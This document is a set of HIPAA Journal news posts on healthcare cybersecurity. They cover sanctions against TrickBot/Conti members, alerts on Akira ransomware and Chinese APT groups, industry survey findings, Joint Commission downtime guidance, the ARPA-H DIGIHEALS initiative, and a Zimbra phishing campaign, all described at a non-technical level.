Healthcare Cybersecurity

Russian National Indicted for Scripps Health Ransomware Attack; 11 TrickBot/Conti Actors Sanctioned

The indictments of multiple members of the TrickBot/Conti Ransomware groups have recently been unsealed and 11 members of these cybercriminal operations have been sanctioned by the United States and the United Kingdom.

A federal grand Jury in the Southern District of California indicted and charged Russian national, Maksim Galochkin, his role in a cyberattack on Scripps Health in May 2021. Galochkin and his co-conspirators are alleged to have conducted more than 900 attacks worldwide using Conti ransomware, including the attack on Scripps Health. A federal grand jury in the Northern District of Ohio indicted Galochkin and co-conspirators Maksim Rudenskiy, Mikhail Mikhailovich Tsarev, Andrey Yuryevich Zhuykov, Dmitry Putilin, Sergey Loguntsov, Max Mikhaylov, Valentin Karyagin, and Maksim Khaliullin, over the use of TrickBot malware to steal funds and confidential information from businesses and financial institutions in the United States since 2015. A federal grand jury in the Middle District of Tennessee returned an indictment charging Galochkin and co-conspirators Rudenskiy, Tsarev, and Zhuykov with conspiring to use Conti ransomware to attack businesses, nonprofits, and governments in the United States from 2020 until June 2022 when the Conti operation was disbanded.

Galochkin was also one of 11 individuals recently sanctioned by the U.S. Department of Justice, the Department of the Treasury’s Office of Foreign Assets Control (OFAC), and the United Kingdom for being part of the Russian TrickBot cybercrime group. TrickBot was first identified in 2016 and started life as a banking Trojan. The malware was developed from the Dyre Trojan and was used to attack and steal money from non-Russian businesses. The modular malware evolved over the years and new capabilities were added which allowed the TrickBot gang to conduct a range of malicious activities, including ransomware attacks. The group is believed to have extorted more than $180 million from victims around the world and conducted many attacks on hospitals and other healthcare providers in the United States. While the TrickBot gang is a cybercriminal group, members of the group are associated with the Russian intelligence services and have conducted attacks on the U.S. government and other U.S. targets in line with the objectives of the Russian intelligence services.

The 11 sanctioned individuals materially assisted with TrickBot operations and include administrators, managers, developers, and coders. Galochkin (aka Bentley, Crypt, Volhvb) is alleged to have led a group of testers and had responsibilities for the development, supervision, and implementation of tests. The other 10 sanctioned individuals are senior administrator Andrey Zhuykov (aka Dif, Defender); lead coder Maksim Rudenskiy; human resources and finance manager Mikhail Tsarev; infrastructure purchaser Dmitry Putilin (aka grad, staff); HR manager Maksim Khaliullin (aka Kagas);  TrickBot developer Sergey Loguntsov; internal utilities group member Mikhail Chernov (aka Bullet); admin team member Alexander Mozhaev (aka Green and Rocco); and coders Vadym Valiakhmetov (aka Weldon, Mentos, Vasm) and Artem Kurov (aka Naned).

18 members of the TrickBot operation have now been sanctioned with the latest 11 adding to the 7 members sanctioned by the United States and United Kingdom in February this year. The addition of these individuals to OFAC’s sanctions list means all property and interests in property of the individuals that are in the United States or in the possession or control of U.S. persons must be blocked and reported to OFAC. All dealings with these individuals by U.S. persons are prohibited, including paying ransoms. Individuals who engage in transactions with sanctioned individuals may themselves be exposed to OFAC designation and any foreign financial institution that knowingly facilitates a significant transaction or provides significant financial services for any of the sanctioned individuals could be subject to U.S. correspondent or payable-through account sanctions.

All of the indicted and sanctioned individuals remain at large. That is likely to remain the case as they are believed to reside in Russia where there is no extradition treaty with the United States.

The post Russian National Indicted for Scripps Health Ransomware Attack; 11 TrickBot/Conti Actors Sanctioned appeared first on HIPAA Journal.

Akira Ransomware Group Targeting the Healthcare and Public Health Sector

The HHS’ Health Sector Cybersecurity Coordination Center (HC3) has issued a health and public health (HPH) sector alert about a new ransomware group called Akira, which has been in operation since March 2023. Akira is a ransomware-as-a-service (RaaS) group that recruits affiliates to conduct attacks in exchange for a percentage of the profits they generate. The group mostly attacks small- to medium-sized businesses, although sets substantial ransom payments, which are typically between $200,000 and $4 million. The group has claimed at least 60 victims in a little over 5 months of operation, including organizations in the HPH sector.

The group engages in double extortion tactics, where valuable data are identified and exfiltrated before files are encrypted. The group issues a ransom demand, payment of which is required for the keys to decrypt files and to prevent the release of stolen data. Victims are required to contact the group via their TOR site to negotiate the ransom payment. Victims who pay the ransom are offered a security report that explains the vulnerabilities the group exploited to access their network.

The group uses a variety of methods for initial access including compromised credentials and the exploitation of vulnerabilities in virtual private networks (VPNs), especially where multi-factor authentication has not been implemented. The group has a Windows and Linux ransomware variant and targets both Windows and VMware ESXi servers and incident response data show the group uses a variety of tools in its attacks, including the PCHunter toolkit, the MASSCAN port scanner, Mimikatz for credential harvesting, WinSCP, and PsExec.

The group is thought to have links to the disbanded Conti ransomware group due to Akira and Conti ransomware using similar code, cryptocurrency wallets, and the directory exclusions. HC3 has shared Indicators of Compromise (IoCs) in the Akira ransomware sector alert and provides several recommended mitigations to help network defenders improve resilience to attacks and detect attacks in progress.

The post Akira Ransomware Group Targeting the Healthcare and Public Health Sector appeared first on HIPAA Journal.

78% of Healthcare Organizations Suffered a Cyberattack in the Past Year

A recent survey of healthcare professionals indicates 78% of healthcare organizations have experienced at least one cybersecurity incident in the past 12 months. 60% of those incidents had a moderate or significant impact on the delivery of care, 15% had a severe impact, and 30% involved sensitive data. Protected Health Information (PHI) was exposed or stolen in 34% of incidents in North America.

The survey was conducted by Pollfish on behalf of the cybersecurity firm Claroty on 1,100 individuals in North and South America, APAC, and Europe. Respondents worked full-time in the health sector in cybersecurity, engineering, IT, or networking. The survey indicates 26% of organizations that experienced a cyberattack paid a ransom to either prevent the release of stolen data or to decrypt encrypted files. The costs of these attacks typically fell in the range of $100,000 to $1 million; however, more than one-third of respondents who experienced a cyberattack said the recovery costs were greater than $1 million. The biggest cost from the attacks in all but the APAC region was operational downtime.

61% of respondents in North America said they were very or moderately concerned about cyberattacks on their systems. The biggest concerns in this region were insider threats (47%), followed by supply chain and privilege escalation attacks (41%), denial of service (DoS) attacks (39%), and ransomware attacks (38%). A majority of organizations (78%) said they have clear leadership in place for medical device security, which is most commonly the responsibility of IT security teams, and cybersecurity programs typically covered sensitive data such as PHI, EHRs, IT systems, endpoints, medical devices, and BMS such as elevators and HVAC equipment. When asked about the security standards, regulations, and guidelines, the NIST and HITRUST Cybersecurity Frameworks were seen as the most important in North America followed by HIPAA and 405(d).

The survey indicates that healthcare organizations have a clear understanding of the aspects of security that need to be improved. The biggest gaps in defenses were cited as medical device vulnerability patching, asset inventory management, and medical device network segmentation. 60% of respondents said their organization’s security posture has improved over the past 12 months and 51% said their security budgets had been increased in the past year; however, efforts to improve cybersecurity were being hampered by the global shortage of cybersecurity professionals. More than 70% of respondents said they were looking to hire additional cybersecurity staff members and 80% said finding qualified candidates was difficult.

“Security challenges in the healthcare sector continue to mount as the number and types of connected assets grow and the attack surface expands. Beyond the financial ramifications organizations in any sector can face in the wake of a successful attack, in healthcare the stakes are raised due to the patient outcomes at risk,” explained Claroty in the report. “With strong security leadership in place, well-rounded security programs implemented, and the adherence to guidelines and frameworks from regulatory bodies, healthcare organizations are on the right track to ensuring cyber and operational resilience. Recognizing there is more work to be done, they are also prioritizing investments in people, processes, and technologies to build resilience further and ensure compliance while delivering uninterrupted, quality care to their patients.”

The post 78% of Healthcare Organizations Suffered a Cyberattack in the Past Year appeared first on HIPAA Journal.

Study Reveals State of External Exposure Management

CyCognito has published its latest State of External Exposure Management Report, which highlights the extent to which vulnerabilities affect organizations and how easy it is for hackers to exploit those vulnerabilities.

For the report, CyCognito’s researchers aggregated and analyzed 3.5 million digital assets across its customer base between June 2022 and May 2023, which includes small, medium, and large enterprises, including Fortune 500 companies.

The study found that 70% of web applications had severe security gaps, such as lacking web application firewall (WAF) protection and not using encrypted connections such as HTTPS, with 25% of web applications lacking both protections. A typical enterprise has more than 12,000 web apps such as APIs, SaaS applications, databases, and servers. The researchers found at least 30% of those web apps have more than 3,000 assets and had at least one exploitable or high-risk vulnerability.

The study confirmed the extent to which personally identifiable information (PII) is put at risk. 74% of assets containing PII were found to be exposed to at least one major exploit, and one in ten assets had at least one easily exploitable issue. While critical severity vulnerabilities are a major concern, for every easily exploitable critical vulnerability identified, there were 133 easily exploitable high, medium, or low severity issues.

As CyCognito explains in the report, the attack surface is constantly changing and its research suggests the attack surface fluctuates by as much as 10% each month. That means that over the course of a year, thousands of new assets may have been added to the network and any one of those assets could contain an exploitable vulnerability. Because the attack surface is dynamic, organizations cannot make do with mapping it just once as the map created will be out of data almost immediately.

Naturally, there is a balance to be struck, so many organizations have a biannual or quarterly mapping cadence, although such infrequent mapping could result in serious gaps in awareness and coverage. “To stay aware of risks as soon as they appear, use frequent mapping and scanning of all assets to maintain an up-to-date, comprehensive understanding of your external attack surface,” suggests CyCognito.

Attention needs to be paid to web apps, which typically account for around 22% of the attack surface. They are easy to deploy, provide access to valuable data, connect businesses with employees and customers, and can have dozens of components, each of which can be affected by security issues. Organizations should ensure that web apps are properly protected with WAF and encrypted connections, especially those that provide access to PII or e-commerce platforms.

Addressing security issues is a never-ending process. It is important to ensure that the most serious issues are prioritized and addressed first. CyCognito recommends using context about affected assets and threat actor activity to identify the most serious threats to prioritize and not to rely on CVSS scores, as there may be a far greater risk from less severe flaws, which threat actors can easily exploit.

The post Study Reveals State of External Exposure Management appeared first on HIPAA Journal.

Joint Commission Issues Guidance on Ensuring Patient Safety After a Cyberattack

The Joint Commission has issued a Sentinel Event Alert offering guidance on preserving patient safety following a cyberattack. Healthcare cyberattacks have been increasing in number and sophistication and it is no longer a case of if a healthcare organization will be attacked but when.

Cyberattacks can cause considerable disruption to healthcare operations and put patient care at risk so it is critical that healthcare organizations do all they can to prevent cyberattacks, such as decreasing the attack surface, updating software and patching promptly, providing phishing awareness training, and implementing a range of cybersecurity solutions. Healthcare organizations must also plan for the worst case scenario and must assume that their defenses will be breached. They must therefore have a tried and tested incident response plan that can be activated immediately in the event of a cyberattack.

When defenses are breached and unauthorized individuals have established a foothold in internal networks, a great deal of the recovery process will be handled by the IT department; however, all hospital staff members must be prepared to operate during such an emergency and must be included in the incident response planning process. A good starting point is the hazards vulnerability analysis (HVA), which is required by the Joint Commission. The HVA must cover human-related hazards, which include cyberattacks. The HVA helps hospitals identify and implement mitigation and preparedness actions to reduce the disruption of services and functions and ensure patient safety in the event of an attack. The Joint Commission also requires a continuity of operations plan, disaster recovery plan, emergency management education and training program, and these must be evaluated annually.

The Sentinel Event Alert provides recommendations on these processes specific to cyberattacks:

  • Evaluate HVA findings and prioritize hospital services that must remain operational and safe during extended downtime.
  • Form a downtime planning committee to develop preparedness actions and mitigations. The planning committee should include representation from all stakeholders.
  • Develop downtime plans, procedures, and resources and ensure they are regularly updated.
  • Designate response teams – An interdisciplinary team should be created that can be mobilized following a cyberattack.
  • Train team leaders, teams, and all staff on operating procedures during downtimes. Develop drills and exercises to ensure staff members are familiar with downtime resources.
  • Establish situational awareness with effective communication throughout the organization and with patients and families.
  • Following a cyberattack, regroup, evaluate, and make necessary improvements to the incident response plan and improve protections for systems to address the specific failures that allowed the attack to succeed.

“Cyberattacks cause a variety of care disruptions – leading to patient harm and severe financial repercussions,” said David W. Baker, MD, MPH, FACP, the Joint Commission’s executive vice president for healthcare quality evaluation and improvement. “Taking action now can help prepare healthcare organizations to deliver safe patient care in the event of future cyberattacks. The recommendations in the Sentinel Event Alert, as well as The Joint Commission’s related requirements on establishing and following a continuity of operations plan, disaster recovery plan and more, can help healthcare organizations successfully respond to a cyber emergency.”

The post Joint Commission Issues Guidance on Ensuring Patient Safety After a Cyberattack appeared first on HIPAA Journal.

Ransomware Groups are Accelerating Their Attacks with Dwell Time Falling to Just 5 Days

Ransomware groups have accelerated their attacks and are now spending less time inside victims’ networks before triggering file encryption, according to the 2023 Active Adversary Report from Sophos. The data for the report came from the first 6 months of 2023 and was gathered and analyzed by the Sophos X-Ops team.

The median dwell time for ransomware groups fell from 9 days to 5 days in the first half of 2023, which the researchers believe is close to the limit of what is possible for hackers. They do not expect the median dwell time to fall below 5 days due to the time it typically takes for the hackers to achieve their objectives. On average, it took 16 hours from initial access for attackers to gain access to Microsoft Active Directory and escalate privileges to allow broad access to internal systems. The majority of ransomware groups do not rely on encryption alone and also exfiltrate data so they can apply pressure to get victims to pay up. Oftentimes, backups of data exist so recovery is possible without paying the ransom, but if there is a threat of data exposure, ransoms are often paid. On average, it takes around 2 days for ransomware gangs to exfiltrate data.

The reduction in dwell time is understandable. The longer hackers remain in networks, the greater the probability that their presence will be detected, especially since intrusion detection systems are getting better at detecting intrusions and malicious activity. One of the ways ransomware groups have accelerated their attacks is by opting for intermittent encryption, where only parts of files are encrypted. The encryption process is far quicker, which means there is less time to detect and stop an attack in progress, but the encryption is still sufficient to prevent access to files.

Ransomware gangs often time their attacks to reduce the risk of detection. In 81% of attacks analyzed by the researchers, the encryption process was triggered outside normal business hours such as at the weekend or during holidays when staffing levels are lower. 43% of ransomware attacks were detected on a Friday or Saturday. While the dwell time for ransomware actors has reduced, there was a slight increase in the dwell time for non-ransomware incidents, which increased from an average of 11 days to 13 days in H1 2023.

In many cyberattacks, a vulnerability was exploited that allowed hackers to use a remote service for initial access, such as vulnerabilities in firewalls or VPN gateways. The exploitation of vulnerabilities in public-facing applications has been the leading root cause of attacks for some time followed by external remote services; however, in H1, 2023, these were reversed and compromised credentials were the root cause in 50% of attacks, with vulnerability exploitation the root cause of 23% of attacks.

Compromised credentials make attacks easy for hackers especially when there is no multi-factor authentication. Implementing and enforcing phishing-resistant MFA should be a priority for all organizations, but the researchers found that in 39% of cases investigated, MFA was not configured. Prompt patching should also be a goal as this reduces the window of opportunity for hackers. The researchers suggest following CISA’s timeline for patching in its Binding Operational Directive 19-02 of 15 days for critical vulnerabilities and 30 days for high-severity vulnerabilities as it will force attackers into a narrower set of techniques by removing the low-hanging fruit.

Previous reports have highlighted the extent to which Remote Desktop Protocol (RDP) is abused. in H1, 2023, RDP was used in 95% of attacks, up from 88% in 2022. In 77% of attacks involving RDP, the tool was used for internal access and lateral movement, up from 65% in 2022. Only 1% of attacks involved RDP for external access. Due to the extent to which RDP is abused, securing RDP should be a priority for security teams. If attackers are forced to break MFA or import their own tools for lateral movement, it will cause attackers to expend more time and effort, which provides defenders with more time to detect intrusions and increases the probability of malicious activity being detected.

The post Ransomware Groups are Accelerating Their Attacks with Dwell Time Falling to Just 5 Days appeared first on HIPAA Journal.

Know Your Adversary: HC3 Shares Details of Chinese APT Groups Targeting the Healthcare Sector

The healthcare industry is actively targeted by financially motivated cybercriminal gangs; however, state-sponsored hacking groups also seek access to healthcare networks and are actively targeting healthcare providers and other entities in the healthcare and public health sector.

In a recently published security advisory, the Health Sector Cybersecurity Coordination Center (HC3) provides a threat profile of some of the most capable Chinese hacking groups that are known to target U.S. healthcare organizations. While at least one Chinese state-sponsored hacking group is known to conduct cyberattacks for financial gain, most groups conduct attacks for espionage purposes and to obtain intellectual property (IP) of interest to the government of the People’s Republic of China, such as IP related to medical technology and medicine. For instance, Chinese hackers targeted pharmaceutical firms during the pandemic seeking COVID-19 vaccine research data.

One of the most active threat groups is known as APT41 (also BARIUM, Winnti, LEAD, WICKED SPIDER, WICKED PANDA, Blackfly, Suckfly, Winnti Umbrella, and Double Dragon). The group has been active since at least 2007 and is known to target U.S. healthcare organizations, most commonly with the goal of obtaining intellectual property to pass to the Chinese government, which operationalizes the technology to bring it to market. The group also engages in espionage and digital extortion and is known to conduct financially motivated cyberattacks, although those operations may be for personal gain rather than at the request of the Chinese government. APT41 aggressively exploits known vulnerabilities, often within hours after public disclosure, as was the case with the ProxyLogon and Log4J vulnerabilities. Once initial access has been gained, the group moves laterally within networks and establishes persistent access, often remaining in networks undetected for long periods while data of interest is exfiltrated. The group has an extensive arsenal of malware and uses well-known security tools in its attacks, such as a customized version of Cobalt Strike, Acunetix, Nmap, JexBoss, and Sqlmap.

APT10 (also known as Menupass Team, Stone Panda, Red Apollo, Cicada, CVNX, HOGFISH, and Cloud Hopper) engages in cyberespionage and cyberwarfare activities and has a focus on military and intelligence data. The group is known to leverage zero-day vulnerabilities to gain access to the networks of targets of interest and uses a variety of custom and public tools to achieve its aims. APT10 conducts highly targeted attacks, with initial access often achieved through spear phishing. The group is also known to target managed service providers (MSPs) in order to attack their downstream clients. The group often engages in living-of-the-land tactics, using tools already installed in victims’ environments.

APT18 (also known as Wekby, TA-428, TG-0416, Scandium, and Dynamite Panda) is a little-known APT group that is believed to work closely with the Chinese military and often targets human rights groups, governments, and a range of sectors, including pharmaceutical and biotechnology firms. The group is known to develop its own zero-day exploits, as well as adapt the exploits of others to meet its operational needs, and uses sophisticated malware such as Gh0st RAT, HTTPBrowser, pisloader, and PoisonIvy. APT18 is believed to be behind a 2014 attack on a healthcare provider in which the data of 4.5 million patients was stolen. The group is thought to have exploited the OpenSSL Heartbleed vulnerability to gain access to the network.

APT22 (also known as Barista, Group 46, and Suckfly) appears to be focused on targeting political entities and the healthcare sector, especially biomedical and pharmaceutical firms. The group is known to identify vulnerable public-facing web servers on victim networks and upload web shells, and uses complex malware such as PISCES, SOGU, FLATNOTE, ANGRYBELL, BASELESS, SEAWOLF, and LOGJAM.

In addition to outlining some of the tactics, techniques, and procedures used by each group, HC3 has shared mitigations to improve security against the most commonly used infection vectors.

The post Know Your Adversary: HC3 Shares Details of Chinese APT Groups Targeting the Healthcare Sector appeared first on HIPAA Journal.

Digital Health Security Initiative Launched by the HHS

The U.S. Department of Health and Human Services’ Advanced Research Projects Agency for Health (ARPA-H) has announced the launch of the Digital Health Security (DIGIHEALS) project which seeks to improve the electronic infrastructure of the U.S. healthcare industry. ARPA-H is a funding agency that was created in 2022 to support biomedical and health research, specifically research that has the potential to advance aspects of medicine and health that cannot be achieved through more traditional research and commercial activity.

Over the past few years, cybercriminals have been targeting the healthcare sector and have been using ransomware to prevent access to critical systems and data. In many attacks, hospitals have been forced to divert ambulances, cancel appointments, and delay care. Many attacks have caused disruption for months and some attacks have resulted in the permanent closure of healthcare facilities.

“The DIGIHEALS project comes when the U.S. healthcare system urgently requires rigorous cybersecurity capabilities to protect patient privacy, safety, and lives,” said ARPA-H Director Dr. Renee Wegrzyn. “Currently, off-the-shelf software tools fall short in detecting emerging cyber threats and protecting our medical facilities, resulting in a technical gap we seek to bridge with this initiative.”

The project aims to reduce the ability of malicious actors to attack digital systems and prevent large-scale cyberattacks and will focus on cutting-edge security protocols, vulnerability detection, and automatic patching to address cybersecurity vulnerabilities and software-related weaknesses.

“By adapting and extending security, usability, and software assurance technologies, this digital health security effort will play a crucial role in addressing vulnerabilities in health systems,” said ARPA-H Program Manager Andrew Carney. “This project will also help us identify technical limitations of future technology deployments and contribute to the development of new innovations in digital security to better keep our health systems and patients’ information secure.”

Through a Broad Agency Announcement, the DIGIHEALS project is soliciting proposals for proven technologies developed for national security and will apply them to civilian health systems, clinical care facilities, and personal health devices to ensure that in the event of a widespread cyberattack, patients will be able to continue to receive the care they need. Proposals should be submitted through the Scaling Health Applications Research for Everyone (SHARE) BAA. ARPA-H anticipates issuing multiple awards.

The post Digital Health Security Initiative Launched by the HHS appeared first on HIPAA Journal.

Largescale Phishing Campaign Targets Zimbra Collaboration Email Servers

Researchers at ESET have identified a largescale and ongoing phishing campaign targeting Zimbra Collaboration email servers at small- and medium-sized businesses and government agencies. The campaign has been active since at least April and is being conducted globally, with Poland, Ecuador, and Italy the most targeted countries. The campaign does not appear to be targeted on any specific vertical.

Targets are sent an email with an HTML attachment. The email warns the user about an email server update or another Zimbra issue, such as a security update. The From field indicates the email has been sent by an email server administrator. The user is told that they need to download the HTML attachment, which will have a URL pointing to a local file patch. The HTML attachment includes the targeted organization’s logo, the organization’s name, and a fake login page, with the username prefilled. The user is only required to enter their password. If the password is entered, the credentials are transmitted by HTTPS POST request to an adversary-controlled server.

The ESET researchers observed waves of phishing emails being transmitted from some of the organizations targeted in the campaign which suggests the threat actor obtained administrator credentials and was able to set up new mailboxes on the server. The researchers suggest that in these cases, the same password may have been used for email and administration. While this email campaign is not particularly sophisticated, it has proven to be effective. Since the HTML attachments contain legitimate code and only one link pointing to a malicious host, which is contained in the HTML rather than the message body, the emails may not be detected as malicious and are likely to bypass antispam policies, especially since the targeted organizations are mostly small- to medium-sized businesses that are unlikely to have advanced email security defenses. ESET was unable to determine which threat actor is behind the campaign.

The post Largescale Phishing Campaign Targets Zimbra Collaboration Email Servers appeared first on HIPAA Journal.